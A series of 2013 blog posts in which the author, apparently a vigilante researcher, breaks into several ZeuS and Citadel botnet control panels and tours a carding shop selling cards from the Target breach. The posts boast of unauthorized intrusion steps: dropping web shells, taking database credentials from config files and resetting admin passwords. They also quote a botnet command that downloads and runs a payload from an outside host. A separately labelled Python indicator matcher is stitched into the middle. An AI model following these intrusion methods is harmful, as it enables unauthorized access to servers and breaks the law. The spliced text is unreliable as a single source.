Monday, December 30, 2013

ZeuS C&C - bestbuyautotransport.com.au

More work done on command & control servers listed on ZeuS Tracker

bestbuyautotransport.com.au
203.170.86.145
netname:        austdomains
descr:          Internet Services Network
descr:          Global Telecommunications
country:        AU
abuse@syra.net.au

ZeuS Tracker details:

Config:

Login:
I can't get in this way, so I try something else.

1. Drop a shell on your sandy seashore.

2. Grab MySQL auth from config files.

3. Look around (so small, sorry buddy).

4. Change admin password (and get proper username).

Let's try again.
Ok. Now we're in.

Confirmed. You have a small useless botnet (and penis).

Some OS statistics for Science:

Useless bots:

Some reports:
No banking.

So silly.

Sunday, December 29, 2013

Citadel C&C hosted on 173.242.112.135

Doing more work on the botnet command & control servers listed on ZeuS Tracker.

Citadel C&C
173.242.112.135 - VolumeDrive US
Citadel bot v.1.3.5.1
90% of bots located in India.
Evidence of stolen banking credentials.

This server panel is offline now and has been removed from ZeuS Tracker, so it's OK to publish details about it.


Original ZeuS Tracker page:

Admin panel login:
http://173.242.112.135/office/obi/server/cp.php?m=login

and kick the door down...

Summary:

205 bots
(143 India)

First page of bot details:
(is that your IP?)

Evidence of stealing credentials:
Facebook.com
ebs.ca-egypt.com (Crédit Agricole Egypt - Online Banking ePayroll System)

Here are some OS statistics to show what systems get infected:
XP, Win7, Win7 x64 and Server 2008 x64

Fun fact:
AntiVirus software is commonly seen running in memory alongside the bot exe. :-)

Some options:
encryption key: obi

The guy was in the process of updating when I broke in. Oops, sorry about that.



user_execute hxxp://142.0.36.226/office/nh.exe

(VolumeDrive again, US, PA - get your shit together)

More details on this host later: 142.0.36.226

nh.exe - cf2cfc5354b62dc0d9bf42a0a3841437
VirusTotal detection: 5 of 48

Malware phones home to:
185.24.233.5 (Ireland)
but the server has already been seen: https://zeustracker.abuse.ch/monitor.php?host=185.24.233.5

Interesting ports on 185.24.233.5:
135/tcp  open     msrpc
139/tcp  open     netbios-ssn
445/tcp  open     microsoft-ds
1720/tcp filtered H.323/Q.931
3389/tcp open     ms-term-serv

Win2k8 R2 Std
Home base for this h4x0r fucker; more on this later.


Saturday, December 28, 2013

ZeuS botnet - powdereddoughnut.com

More work on the ZeuS Tracker C&Cs.

powdereddoughnut.com - hosting small ZeuS botnet
199.204.248.103 - JumpLine, US, Ohio
Domain has Whois protection

Targets include VN and AE .gov sites
POP3 and HTTP credentials; no banking credentials seen



Config: f8e2d5d42364f80332c7661dd5fbe4a3

ZeuS C&C login:

breaking...

Summary:
42 bots - why you so shitty and small?


OS statistics to show what systems get hit.
Note: Win7 x64

Someone left a sandy sea shell on your sea shore...

Shared hosting - wtf, really?

$ uname -a
Linux cpanel03.myhostcenter.com 2.6.32-358.6.2.el6.x86_64 #1 SMP Thu May 16 20:59:36 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

$ id
uid=33351(powdered) gid=33355(powdered) groups=33355(powdered)

bot_uninstall

Reported abuse to:
postmaster( a t )myhostcenter.com
compliance( a t )opensrs.org

Chinese Food - TrojDropper:Win32/Swisyn (etc)

TrojDropper:Win32/Swisyn (etc)
hosted on:
61.147.112.88 (China Telecom, Beijing)

This HTTPFileServer seems to be a popular choice for Chinese actors to host malware on Windows servers.

I was downloading samples and the server went down for a bit.

While I waited I sent them through malwr.com to get a quick analysis.

232.exe (21.exe) - 4a92ffcb4f35ab8e7daf4215e09b58f1
330.exe - 4e8a0bed5ee626f202fcdcfa28b3176c
0308.exe - 88ccbe2772f4a07f0a7f5925b1a366ac
3.exe - d9443a02281d495ab3ac1eea6a97d0d5
338.exe - 776166289f8bce8312b85ffd0a375c01
55555 - 49d206f98b44ef9c58b711cd29b6c073 (ELF executable)
8G.NETBOT.CC.zip - 9b71e5d676d005160f9096a618d33862
3306nodeJR - 938a3ceb3691ca92734dcce7547ef394

C&C:
8g.netbot.cc - 100.42.235.28
kk.netbot.cc - 190.115.20.14
33.netbot.cc - 190.115.20.14

190.115.20.18
190.115.20.14
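Added example (not code from the original posts): a small Python matcher that uses the C&C hosts and payload IP from the Citadel and Swisyn posts above as a constructed indicator table, undoes the hxxp:// defanging used in these write-ups, and flags constructed proxy log lines whose host, or a parent domain of it, is listed. This is the local check a defender runs before looking a host up on ZeuS Tracker as done in the Citadel post; the log format and labels are assumptions.

```python
import re

# Constructed indicator table built from the C&C hosts and payload URL listed in
# the Citadel and Swisyn posts above; a real deployment would load a feed instead.
INDICATORS = {
    "185.24.233.5": "phone-home host (Citadel post)",
    "142.0.36.226": "payload host, nh.exe (Citadel post)",
    "173.242.112.135": "Citadel C&C panel",
    "8g.netbot.cc": "C&C (Swisyn post)",
    "kk.netbot.cc": "C&C (Swisyn post)",
    "190.115.20.14": "C&C (Swisyn post)",
    "61.147.112.88": "HTTPFileServer malware host (Swisyn post)",
}

HOST_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://)?([^/:\s]+)", re.I)

def host_of(url):
    """Host part of a URL (scheme, port and path dropped), with hxxp:// and [.] defanging undone."""
    m = HOST_RE.match(url.replace("hxxp", "http").replace("[.]", "."))
    return m.group(1).lower().rstrip(".") if m else ""

def match_indicator(host):
    """Return (indicator, label) if host or one of its parent domains is listed, else None."""
    parts = host.lower().rstrip(".").split(".")
    # try the host itself, then each parent (dl.8g.netbot.cc -> 8g.netbot.cc), never the bare TLD
    for i in range(max(1, len(parts) - 1)):
        candidate = ".".join(parts[i:])
        if candidate in INDICATORS:
            return candidate, INDICATORS[candidate]
    return None

# Constructed proxy log lines: "<epoch> <client_ip> <method> <url>"
SAMPLE_LOG = """\
1388275200 10.0.0.12 GET http://www.example.com/index.html
1388275201 10.0.0.12 GET hxxp://142.0.36.226/office/nh.exe
1388275202 10.0.0.34 POST http://185.24.233.5/gate.php
1388275203 10.0.0.34 GET http://dl.8g.netbot.cc/3.exe
1388275204 10.0.0.56 GET http://190.115.20.14:8080/
"""

def scan_log(text):
    """Return (client_ip, indicator, label) for every line whose URL host hits the table."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            hit = match_indicator(host_of(fields[3]))
            if hit:
                hits.append((fields[1], hit[0], hit[1]))
    return hits
```

Running scan_log(SAMPLE_LOG) flags four of the five constructed lines; the example.com line stays clean.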

i-buy.gr hosting ZeuS botnet (now offline)

Working on the ZeuS Tracker C&Cs today.

New server added yesterday, 27 Dec, hosted on http://www.i-buy.gr

Control Panel login:

and now for a little B&E action...

boom

Summary:
very small botnet

Some stats about which OSes are getting hit:

Another shell.

Contacted them... and their ISP.

Control panel now offline.

:-)

Personally, "I-will not-buy.gr" anything from these guys.
This box was ransacked: there were no auth logs, multiple shells, etc.
They obviously need to get their shit together.


Friday, December 20, 2013

Rscator.la - carding shop selling stolen cards from Target breach

In December 2013, millions of consumers' credit card information was stolen by hackers from the retail giant Target.

Brian Krebs wrote an excellent article explaining how these stolen cards are 'flooding underground markets'
http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/

This post is a look inside the carding shop that is selling stolen credit card information from the Target data breach.

It is the usual shit carding shop: buy CCs and dumps, BIN lookup, checker, etc.

One interesting thing about this shop: it features an automated WU (Western Union) and MG (MoneyGram) account crediting system. If you want to fund your account and make a purchase from this shop, you must reserve a 'drop' person to wire money to in Lviv, Ukraine. Nice.

Here we go...

Lovely login screen for a crook shop :-)
3 admins

Support:
JID: trayan@lampeduza.org
ICQ: 100845
JID 2: flavius@lampeduza.org
ICQ 2: 17700
JID 3: rescator@lampeduza.org
ICQ 3: 10576

Senator Rescator is some asshole hacker on the underground forum Lampeduza; thus Rescator.la is his. You can see he is listed as the 3rd admin.

After the login page: News

Adverts for Kaddafi.hk on site - a related carder shop

News page, recent activity, active shop.

Dumps

Note: over 199k out of 200k dumps are from America.

CC and Dumps pages:

BIN Lookup

Checker

Ticketing system for support

Add money:

This is the interesting part: in order to fund your account on this shop, you reserve a 'drop' and wire them the cash...

Lol at this:
P.S. Please send your transfers in non-exact amounts by adding 1-2-3-4-5-6-7 dollars. Meaning, when you want to transfer 500 dollars, please send - 508, 506, 503, 504, 505. That will help receiving funds much, much faster.

Add money, reserve drop:

And Lol at this:
Send all your transfers to:
City: Lviv
Country: Ukraine